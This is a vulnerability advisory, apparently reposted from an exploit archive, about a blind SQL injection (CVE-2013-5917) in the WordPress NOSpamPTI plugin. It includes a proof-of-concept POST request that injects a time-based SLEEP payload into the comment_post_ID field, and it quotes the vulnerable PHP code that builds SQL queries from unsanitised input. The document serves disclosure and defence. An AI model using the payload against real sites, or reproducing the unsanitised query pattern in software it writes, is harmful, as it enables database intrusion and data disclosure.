[webapps] - Wordpress NOSpamPTI Plugin - Blind SQL Injection

[ NOSpamPTI Wordpress plugin Blind SQL Injection ][ Vendor product description ]NOSpamPTI eliminates the spam in your comment box so strong and free,developed from the idea of Nando Vieira http://bit.ly/d38gB8, but some themes do not supportchanges to the functions.php to this we alter this function andavailable as a plugin. Make good use of this plugin and forget all the Spam.[ Bug Description ]NOSpamPTI contains a flaw that may allow an attacker to carry out aBlind SQL injection attack. The issue is due to the wp-comments-post.phpscript not properly sanitizing the comment_post_ID in POST data. Thismay allow an attacker to inject or manipulate SQL queries in theback-end database, allowing for the manipulation or disclosure ofarbitrary data.[ History ]Advisory sent to vendor on 09/09/2013Vendor reply 09/20/2013. According the vendor, the plugin was deprecated.[ Impact ]HIGH[ Afected Version ]2.1[ CVE Reference]CVE-2013-5917[ POC ]Payload:POST /wordpress/wp-comments-post.phpauthor=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1AND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1[ Vulnerable code ]$post_id = $_POST['comment_post_ID'];load_plugin_textdomain('nospampti',WP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/'); if ($hash != $challenge) { $wpdb->query("DELETE FROM {$wpdb->comments} WHERE comment_ID ={$comment_id}"); $count = $wpdb->get_var("select count(*) from $wpdb->commentswhere comment_post_id = {$post_id} and comment_approved = '1'");[ Reference ][1] No SpamPTI SVN repository -http://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php[2] Owasp - https://owasp.org/index.php/SQL_Injection[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/--------------------------------------------iBliss Segurança e Inteligência - Sponsor: Alexandro Silva - Alexos

View the original article here